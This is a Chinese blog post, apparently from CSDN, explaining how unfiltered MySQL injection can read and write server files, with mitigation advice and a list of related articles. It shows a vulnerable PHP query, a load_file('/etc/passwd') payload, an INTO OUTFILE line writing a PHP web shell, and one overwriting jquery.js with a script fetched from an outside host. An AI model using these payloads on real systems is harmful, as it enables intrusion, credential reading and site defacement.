mysql注入之系统操作系统文件

最新推荐文章于 2022-08-17 16:55:22 发布
最新推荐文章于 2022-08-17 16:55:22 发布
阅读量351 收藏 1
点赞数
分类专栏: 数据库mysql 文章标签: 数据库 操作系统 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/canlynet/article/details/84856842
版权

mysql注入最典型的的场景莫过于不对参数进行过滤,比如典型的语句,选择一个用户信息显示php代码:

$sql = "select * from  user where id={$_GET['id']}";

用户只需要在浏览器地址栏中网址后面的比如:id=23修改一下:

http://xxx.com/xxx?id=23 union all select * from user;

这就能筛选出所有用户了。

避免这类事情出现的方法自然是使用参数过滤,用数据库驱动接口中的mysql_real_escape_string可以解决这个问题。当然最稳妥的还是使用框架来写代码,框架已经对mysql注入进行了比较好的防范。但是,使用框架后一定要切记尽量不要评价sql语句,只要拼接,就要考虑注入问题。

这里要提出的是,mysql还有一个功能,它能加载文件显示,比如:

select load_file('/etc/passwd');

避免这个问题的方法自然是进行参数过滤。

 

它还能写入文件,比如:

select '<?php system(\'cat /etc/passwd\'); ?>' into outfile '/data/web/www/command.php';

这样,用户就可以从网址输入command.php访问页面,从而达到查看linux系统中用户信息的目的。当然,利用这个方式还可以给网站各个js注入代码。

避免这个问题产生的方法除了参数过滤以外,还可以让mysql运行在mysql用户下,网站文件则用apache用户或www用户等,并且不要简单的把所有文件权限设置为777。

windows用户就比较惨了,如果原生方法写代码,又不对参数进行过滤,那么往网站js中注入代码就是很简单的事情,比如:

select '<script src=\'http://xxxx.xxx.com/xxx.js\'>' into outfile 'D:\\web\\www\\htdocs\\js\\jquery.js';

这个语句将给jquery.js注入危险的js代码。当然还可以写一个php文件,然后执行它,这个文件则是想做什么都可以了,反正php文件是可以操作服务器文件的。

 

canlynet
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL中的目录和文件
m0_70299172的博客
05-07 421
1,bin目录 1.1,启动MySQL服务器程序 1.2,客户端程序 2,启动选项和参数 2.1,配置参数文件 2.2,参数的查看和修改 3,数据目录 3.1,确定MySQL中的数据目录 3.2,数据目录中放些什么? 3.2.1,数据库在文件系统中的表示 3.2.2,表在文件系统中的表示 3.2.3,lnnoDB是如何存储表数据的 3.2.4,MyISAM是如何存储表数据的 3.3,日志文件 3.4,其他的数据文件
10-sql注入-mysql注入1
08-03
- `@@version_compile_os`:揭示编译时的操作系统。 4. **数据库连接配置**: 数据库连接信息通常存储在诸如`Config.php`、`Db_config.php`、`Include/common.inc.php`、`caches/configs/databases.asp`等配置...
文件系统类数据读取与保存 MySQL_大数据培训
zjjcchina的博客
08-17 290
支持通过Java JDBC访问关系型数据库。//2.创建SparkContext。//3.定义连接mysql的参数。//1.创建spark配置信息。//创建JdbcRDD。(2)从Mysql读取数据。(3)往Mysql写入数据。
MySQL 系统文件你了解吗
醉鱼的博客
12-09 229
日志文件 查看错误日志 show variables like '%log_error%' 查看通用查询日志 show variables like '%general%' 二进制日志binary log 记录执行的更改操作 show variables like '%log_bin%';//是否开启 show variables like 'binlog' ;//参数查看 show binary logs; //查看日志文件 慢查询日志 show variables like '%s
应用mysql系统文件_通过数据库实现文件系统与直接使用操作系统文件系统各有哪些优势和劣势?...
weixin_28543661的博客
02-02 171
这是个很好的问题。如果要抠字眼的话,首先要定义问题里面的第一个文件系统是一个什么概念。一般的理解,这个文件系统是指实现了类似操作系统文件管理功能的文件访问接口。那么操作系统对于文件系统来说,具体有那些接口呢?除了文件的创建,读取,修改,删除之外,文件系统实际上很重头,很核心的部分是对文件权限的访问控制,这一点在unix系统上非常明显,按照所有者控制,按照群组控制,文件是否可以修改,是否可以执行。等...
Mysql系统文件--日志文件、数据文件
zhoushimiao1990的博客
09-26 2035
系统文件包数据文件、配置文件、pid进程文件、socket网络链接文件,这些文件都可以理解为日志文件。 日志文件分类: 错误日志(error log) : 记录mysql服务的启停时正确和错误的信息,还记录启动、停止、运行过程中的错误信息。默认开启, 查看命令 --- show variables like '%log_error%' 通用查询日志(general query log) : 记录一般查询语句, 查看命令 --- show variables like '%general%' 中继..
MySQL注入绕开过滤的技巧总结
09-09
MySQL注入是一种常见的安全漏洞,攻击者可以通过输入恶意的SQL语句来操纵数据库,获取敏感信息或执行非授权的操作。当系统有防止SQL注入的过滤机制时,攻击者需要采用一些技巧来绕过这些过滤。以下是一些常见的MySQL...
php+mysql仓库管理系统
10-16
功能特点(具体功能请实际操作系统):  ①产品列表  ②自动标语  ③出入库审批  ④留言管理  ⑤挂机模式订单自动提醒  ⑥防SQL注入安全    管理员初始帐号:mxszpt  密码:mxszpt 运行环境:...
Mysql注入.pdf
最新发布
01-25
MySQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤或转义用户输入,导致恶意SQL命令被执行。这种漏洞允许攻击者绕过权限控制、获取敏感信息、修改或删除数据,甚至完全控制数据库服务器。OWASP...
PHP PDO操作MySQL基础教程
10-19
要在PHP中使用PDO操作MySQL,首先需要确保在php.ini配置文件中启用了PDO及PDO_MYSQL扩展。在Windows环境下,这通常意味着你需要取消注释这两行: ```ini extension=php_pdo.dll extension=php_pdo_mysql.dll ``` ...
MySQL数据库系统中的文件
bokerr的博客
10-06 699
Innodb存储引擎的文件概述参数文件日志文件错误日志慢查询日志查询日志二进制日志 binary log二进制日志的配置二进制日志的作用二进制日志的保存socket 套接字文件pid文件MySQL表结构定义文件存储引擎文件 概述 本文主要讲述MySQL数据库和Innodb存储引擎表的各种类型文件,主要包括如下内容: 参数文件 日志文件 socket 文件 pid文件 MySQL表结构定义文件 存储引擎文件 参数文件 启动时它告诉MySQL实例,在哪里可以找到数据库相关文件,除此之
mysql 文件需要从文件系统读取_MySQL学习(一):存储引擎、参数、测试等
weixin_36079903的博客
01-27 164
本篇介绍了MySQL的大致内容,包括性能瓶颈、事务、存储引擎、文件系统、Liinux参数优化和MySQL参数优化等;后面会介绍关于MySQl的表结构优化、索引优化、SQL查询优化、分库分表和数据库监控等。性能瓶颈网络IO磁盘IORAID(磁盘冗余队列):可以把多个容量较小的硬盘组成一组容量更大的硬盘,并提供数据冗余来保证数据的完整性的技术。RAID0:只需要2块以上硬盘即可,但没有提供冗余或错误修...
mysql 流读取文件_MySQL文件读取
weixin_34254083的博客
02-07 894
读取服务端文件读取文件利用方式load_file()select load_file('/etc/passwd')load data infile() 利用该函数读文件时需要将文件内容保存至一个表中,在方便查看结果的情况下,一般最好自己创建一个新表来保存查询的结果。-- 创建存储结果的表create table result(cmd text);-- 读取文件内容到表中load data infi...
Mysql数据库操作系统及配置参数优化
weixin_30666401的博客
12-16 293
数据库结构优化 表的水平拆分常用的水平拆分方法为:1.对 customer_id进行 hash运算,如果要拆分成5个表 则使用mod(customer_id,5)取出0-4个值2.针对不同的 hashID 把数据存到不同的表中。挑战:1.跨分区表进行数据查询2.统计及后台报表操作 操作系统配置优化 数据库是基于操作系统的,目前大多数MySQL都是安装在Linux系统之上,所以对于操作...
mysql几种读取文件方法的使用
weixin_34116110的博客
03-21 2758
mysql数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(但前提是权限足够) 总结下mysql在不同版本读取文件方法大致有这3个: 1.load_file() 2.load data infile() 3.system cat load_file()和load data infile读取文件的方法为:新建一个表,读取文件为字符串形式插...
Mysql 系统信息函数
beOkWithAnything
09-29 992
系统信息函数 系统信息函数用来查询MySQL数据库的系统信息。例如,查询数据库的版本,查询数据库的当前用户等。 获取MySQL版本号、连接数、数据库名的函数 VERSION()函数返回数据库的版本号; CONNECTION_ID()函数返回服务器的连接数,也就是到现在为止MySQL服务的连接次数; DATABASE()和SCHEMA()返回当前数据库名。 获取用户名的函数 U...
MySQL函数-系统信息函数
qq_36127031的博客
03-05 815
系统信息函数用来查询MySQL数据库的系统信息。1、VERSION() 返回数据库的版本号 SELECT VERSION() -- 5.0.67-community-nt2、CONNECTION_ID() 返回服务器的连接数 SELECT CONNECTION_ID() -- 33、DATABASE()、SCHEMA 返回当前数据库名4、USER()、SYSTEM_USER()、SESSION_U...
浅析MySQL恶意服务器读取文件原理
蚁景网安学院
03-25 4085
搭建MySQL恶意服务器读取文件这件事,虽然直接利用门槛较高,但是由于在网上看到了一种比较新颖的利用方式(利用社会工程学引诱用户连接MySQL进而读取用户文件),个人觉得比较有意思,总结了一下攻击原理以及攻击方式...
mysql读取配置文件机制分析
lambda
05-03 601
1 配置文件 最近看了很多篇mysql相关的博客, 发现mysql涉及的配置文件很多, 不知道到底该用哪个, 相信很多mysql初学者跟我一样有这样的困惑 本人操作系统: ubuntu20.04 LTS MySQL版本: 8.0.23 (1) /etc/mysql/my.cnf (2) /etc/mysql/mysql.conf.d/mysqld.cnf (3) /etc/mysql/conf.d/mysql.cnf 2 查看mysql的配置文件导入顺序 是不同的mysql版本用不同的配置文件吗? 不
mysql校园图书管理系统
12-31
校园图书管理系统是一个用于管理图书馆资源和借阅信息的系统。它可以帮助图书管理员和学生进行个人信息管理、图书信息查询、...你可以按照项目中的数据库文件进行配置,然后运行项目,查看系统的运行效果和功能实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值